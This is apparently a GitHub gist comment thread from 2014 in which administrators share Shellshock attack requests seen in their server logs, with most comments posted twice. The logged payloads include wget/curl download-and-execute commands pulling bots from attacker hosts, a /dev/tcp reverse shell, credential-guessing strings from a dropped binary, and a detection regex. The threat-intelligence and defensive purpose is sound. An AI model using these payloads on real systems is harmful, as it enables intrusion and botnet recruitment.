Ok, shits real. Its in the wild... src:162.253.66.76

gistfile1.txt

GET./.HTTP/1.0
.User-Agent:.Thanks-Rob
.Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Accept:.*/*

$ file nginx 
nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped

$ md5sum nginx 
5924bcc045bb7039f55c6ce29234e29a  nginx

$ sha256sum nginx 
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489  nginx

Looking at string variables, it appears to be a kernel exploit with a CnC component.
- found by @yinettesys

oh wow... thx Rob

oh wow... thx Rob

shit, good work

shit, good work

🎱

🎱

omg

omg

This probably connects to 89.238.150.154:5 for C&C? Which sends a "PING", and probably expects "PONG!".

This probably connects to 89.238.150.154:5 for C&C? Which sends a "PING", and probably expects "PONG!".

Seems to connect to 108.162.197.26 which is a cloudflare IP.

Seems to connect to 108.162.197.26 which is a cloudflare IP.

Holy bejesus.

Holy bejesus.

Curl would be better. It comes natively in nearly everything, wget does not.

Curl would be better. It comes natively in nearly everything, wget does not.

Analysis of the ELF dropped I wrote in VT: https://www.virustotal.com/en/file/73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489/analysis/1411634118/ < see comment part. I open repo of this ELF malware family as Linux/Bash0day : http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3505#p23987
Thanks Yinettesys! good findings #MalwareMustDie!!

Analysis of the ELF dropped I wrote in VT: https://www.virustotal.com/en/file/73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489/analysis/1411634118/ < see comment part. I open repo of this ELF malware family as Linux/Bash0day : http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3505#p23987
Thanks Yinettesys! good findings #MalwareMustDie!!

Does this affect Rails?

See:
https://github.com/rails/rails/blob/ce148025f221b75c82020782a5adef58a07de98c/actionpack/lib/action_dispatch/http/request.rb#L37

Does this affect Rails?

See:
https://github.com/rails/rails/blob/ce148025f221b75c82020782a5adef58a07de98c/actionpack/lib/action_dispatch/http/request.rb#L37

Nice - the following text strings are in the binary:

root
admin
user
login
guest
toor
changeme
1234
12345
123456
default
pass
password

Nice - the following text strings are in the binary:

root
admin
user
login
guest
toor
changeme
1234
12345
123456
default
pass
password

denartha you should send a note to the author.

denartha you should send a note to the author.

OMG

OMG

If I had to make an uneducated guess, I'd say this thing is a rush job to get a botnet up&running really fast (lack of obfuscation, section headers weren't stripped, and so on)

If I had to make an uneducated guess, I'd say this thing is a rush job to get a botnet up&running really fast (lack of obfuscation, section headers weren't stripped, and so on)

This should be interesting.

This should be interesting.

屌~~~

屌~~~

Rob a hero!

Rob a hero!

Thanks Yinette and Rob, et. al.,
For those who made it here and have read the thread and are wondering what they should probably do right now, the best thing would likely be to update and upgrade (for starters).

This is done from your terminal.

Mac / OSX:
brew cleanup
brew update
brew upgrade
(That should do it... you may also wish to try to see what is outdated, with this:)
brew outdated

Debian / Ubuntu: sudo apt-get update && sudo apt-get upgrade
(Once that's done, please check again from your standard software updater tool)

Fedora / CentOS: You may want to read this thing first, maybe
https://fedoraproject.org/wiki/Upgrading_Fedora_using_yum#Upgrading_Fedora_using_yum_directly

PREPAAAAAARRRRE

Thanks Yinette and Rob, et. al.,
For those who made it here and have read the thread and are wondering what they should probably do right now, the best thing would likely be to update and upgrade (for starters).

This is done from your terminal.

Mac / OSX:
brew cleanup
brew update
brew upgrade
(That should do it... you may also wish to try to see what is outdated, with this:)
brew outdated

Debian / Ubuntu: sudo apt-get update && sudo apt-get upgrade
(Once that's done, please check again from your standard software updater tool)

Fedora / CentOS: You may want to read this thing first, maybe
https://fedoraproject.org/wiki/Upgrading_Fedora_using_yum#Upgrading_Fedora_using_yum_directly

PREPAAAAAARRRRE

Just saw this user-agent in the wild as well:
() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444

Just saw this user-agent in the wild as well:
() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444

@ABISprotocol re: OSX, that won't patch the system's bash. You have to compile bash yourself, follow these instructions if you want: http://apple.stackexchange.com/questions/146849/how-do-i-recompile-bash-to-avoid-the-remote-exploit-cve-2014-6271-and-cve-2014-7/146851#146851

@ABISprotocol re: OSX, that won't patch the system's bash. You have to compile bash yourself, follow these instructions if you want: http://apple.stackexchange.com/questions/146849/how-do-i-recompile-bash-to-avoid-the-remote-exploit-cve-2014-6271-and-cve-2014-7/146851#146851

Looks like someone is gathering a list:

grep '() { :;}' *

access_log:89.207.135.125 - - [25/Sep/2014:02:52:27 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

Looks like someone is gathering a list:

grep '() { :;}' *

access_log:89.207.135.125 - - [25/Sep/2014:02:52:27 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

I created a gist showing how to add a line to your bashrc to identify the presence of the vulnerability. This is useful to me because I work on many different servers with many different administrators, and I sync my bashrc across machines using Git. I would appreciate input!

I created a gist showing how to add a line to your bashrc to identify the presence of the vulnerability. This is useful to me because I work on many different servers with many different administrators, and I sync my bashrc across machines using Git. I would appreciate input!

Caught one passing in as User Agent string at 14:34.

Reason: User header "HTTP_USER_AGENT" contains "() { :;}"

IP Address: 93.103.21.231
Hostname: 93-103-21-231.static.t-2.net
Location: Kranj, 52 (Slovenia)
User Agent: () { :;}; wget 'http://taxiairportpop.com/s.php?s=http://target.tld/'

Caught one passing in as User Agent string at 14:34.

Reason: User header "HTTP_USER_AGENT" contains "() { :;}"

IP Address: 93.103.21.231
Hostname: 93-103-21-231.static.t-2.net
Location: Kranj, 52 (Slovenia)
User Agent: () { :;}; wget 'http://taxiairportpop.com/s.php?s=http://target.tld/'

209.126.230.72 - - [25/Sep/2014:00:36:54 +0000] "GET / HTTP/1.0" 200 346 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.135.125 - - [25/Sep/2014:11:11:00 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 536 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:20:17:06 +0000] "GET / HTTP/1.1" 200 327 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"

Surely someone could come up with a creative script to run in place of ping. Maybe tweet the offending scanner IP address with #SHELLSHOCK hashtag.

209.126.230.72 - - [25/Sep/2014:00:36:54 +0000] "GET / HTTP/1.0" 200 346 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.135.125 - - [25/Sep/2014:11:11:00 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 536 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:20:17:06 +0000] "GET / HTTP/1.1" 200 327 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"

Surely someone could come up with a creative script to run in place of ping. Maybe tweet the offending scanner IP address with #SHELLSHOCK hashtag.

wow,cool!THX!

wow,cool!THX!

Found another:

80.85.87.249 - - [25/Sep/2014:12:07:51 +0000] "GET /cgi-bin/hello HTTP/1.0" 404 290 "-" "() { :;}; /bin/bash -c "wget 82.220.38.36/r.txt -O /tmp/klogd""

Found another:

80.85.87.249 - - [25/Sep/2014:12:07:51 +0000] "GET /cgi-bin/hello HTTP/1.0" 404 290 "-" "() { :;}; /bin/bash -c "wget 82.220.38.36/r.txt -O /tmp/klogd""

bmurch: shouldn't that be "grep '() {' *"? The colon doesn't have to be a colon for it to work.

bmurch: shouldn't that be "grep '() {' *"? The colon doesn't have to be a colon for it to work.

109.202.102.224 - - [25/Sep/2014:09:44:58 -0500] "GET /cgi-bin/hello HTTP/1.0" 404 494 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur""

-- this one showed up a couple times on our servers today from netherlands. the source it pulls from http://213.5.67.223/jur has what looks to be a botnet with a worm component.

edit - looks like the 213.5.67.223 removed the exposed file. I have a copy of it, is there anyone in the security community I can send it to? there is some pretty scary looking shit in it. damn perl script has a built in port scanner, bot net tcp/udp flooders and spreader.

109.202.102.224 - - [25/Sep/2014:09:44:58 -0500] "GET /cgi-bin/hello HTTP/1.0" 404 494 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur""

-- this one showed up a couple times on our servers today from netherlands. the source it pulls from http://213.5.67.223/jur has what looks to be a botnet with a worm component.

edit - looks like the 213.5.67.223 removed the exposed file. I have a copy of it, is there anyone in the security community I can send it to? there is some pretty scary looking shit in it. damn perl script has a built in port scanner, bot net tcp/udp flooders and spreader.

it work on android?

it work on android?

Can anyone else confirm if this is a suitable intermediary fix whilst we wait for a more permanent fix?

akamai/bash@7caac6e

On OS X, I applied all the patches (http://ftp.gnu.org/gnu/bash/bash-4.3-patches/) and rebuilt bash 4.3 from source after making this change manually to variables.c and it appears to be working. Not able to reproduce the Bash bug vulnerability as such...

Can anyone else confirm if this is a suitable intermediary fix whilst we wait for a more permanent fix?

akamai/bash@7caac6e

On OS X, I applied all the patches (http://ftp.gnu.org/gnu/bash/bash-4.3-patches/) and rebuilt bash 4.3 from source after making this change manually to variables.c and it appears to be working. Not able to reproduce the Bash bug vulnerability as such...

Somebody did this that supposedly works for both Mac / OSX and (all?) Linux variants, but test it yourself and have a go: https://shellshocker.net/

Somebody did this that supposedly works for both Mac / OSX and (all?) Linux variants, but test it yourself and have a go: https://shellshocker.net/

Same here, got different requests since yesterday morning: `[26/Sep/2014:09:10:11 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 401 652 "-" "() { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1""``

Same here, got different requests since yesterday morning: `[26/Sep/2014:09:10:11 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 401 652 "-" "() { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1""``

198.101.206.138 also here:
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1052 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
213.5.67.223 - - [25/Sep/2014:15:46:35 +0200]

...and this one:
"GET /cgi-bin/his HTTP/1.0" 404 1044 "-" "() { :;}; /bin/bash -c "cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur""

198.101.206.138 also here:
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1052 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
213.5.67.223 - - [25/Sep/2014:15:46:35 +0200]

...and this one:
"GET /cgi-bin/his HTTP/1.0" 404 1044 "-" "() { :;}; /bin/bash -c "cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur""

A n00b question here:
If the logs show up as 404'd does it mean the UserAgent env were not actually evaluated - i.e. exploit failed ?

A n00b question here:
If the logs show up as 404'd does it mean the UserAgent env were not actually evaluated - i.e. exploit failed ?

@Cherrytreee do you have cgi scripts? If not then you're safe atm.

@Cherrytreee do you have cgi scripts? If not then you're safe atm.

@ChrisMCMine I don't. Thx!

@ChrisMCMine I don't. Thx!

More in the wild, though it looks like one of those "Is your site affected?" website scanners like shellshocker.net (if not for the remote file fetching). In this case, I wonder if it's necessarily a good idea for people to be creating "Check your website" online testers since it provides a proxy option for people with more malicious intent.

IP Address: 74.201.85.67
Location: Atlanta, GA 30303

http://target.tld:80/cgi-bin/test.sh
http://target.tld:80/cgi-bin/info.sh
http://target.tld:80/cgi-bin/test.sh
http://target.tld:80/cgi-bin/php.fcgi
http://target.tld:80/cgi-bin/php

User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"

Timestamp: 9/26/2014 8:39:45 AM

More in the wild, though it looks like one of those "Is your site affected?" website scanners like shellshocker.net (if not for the remote file fetching). In this case, I wonder if it's necessarily a good idea for people to be creating "Check your website" online testers since it provides a proxy option for people with more malicious intent.

IP Address: 74.201.85.67
Location: Atlanta, GA 30303

http://target.tld:80/cgi-bin/test.sh
http://target.tld:80/cgi-bin/info.sh
http://target.tld:80/cgi-bin/test.sh
http://target.tld:80/cgi-bin/php.fcgi
http://target.tld:80/cgi-bin/php

User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"

Timestamp: 9/26/2014 8:39:45 AM

@UAHR
[25/Sep/2014:11:10:43 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 403 296 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
snap!

@UAHR
[25/Sep/2014:11:10:43 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 403 296 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
snap!

I created a regex that matches the different attacks. (egrep compatible v4)

()\s{.;\s}\s*;

Examples:
http://rubular.com/r/FRoObXn9Kx

I created a regex that matches the different attacks. (egrep compatible v4)

()\s{.;\s}\s*;

Examples:
http://rubular.com/r/FRoObXn9Kx

just discovered a new one in our server logs..

X.X.X.X - - [27/Sep/2014:06:18:02 +0200] "GET /de HTTP/1.0" 200 36399 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://customer-domain-censored.com/\x22""

just discovered a new one in our server logs..

X.X.X.X - - [27/Sep/2014:06:18:02 +0200] "GET /de HTTP/1.0" 200 36399 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://customer-domain-censored.com/\x22""

"() { :;}; /bin/bash -c "wget --delete-after http://remika.ru/userfiles/file/test.php\"

"() { :;}; /bin/bash -c "wget --delete-after http://remika.ru/userfiles/file/test.php\"

艹

艹

Found this: "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"

Found this: "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"

and another one bites the dust..

62.210.75.170 - - [30/Sep/2014:00:13:28 +0200] "GET /de/cgi-mod/index.cgi HTTP/1.1" 404 315 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'"

and another one bites the dust..

62.210.75.170 - - [30/Sep/2014:00:13:28 +0200] "GET /de/cgi-mod/index.cgi HTTP/1.1" 404 315 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'"

Great,

Great,

86.34.164.238 - - [28/Sep/2014:13:01:55 +0800] "GET / HTTP/1.0" 200 364 "-" "() { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh""

Seems fairly straight-forward.

86.34.164.238 - - [28/Sep/2014:13:01:55 +0800] "GET / HTTP/1.0" 200 364 "-" "() { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh""

Seems fairly straight-forward.

omg

omg

it work on android?

thats fine

it work on android?

thats fine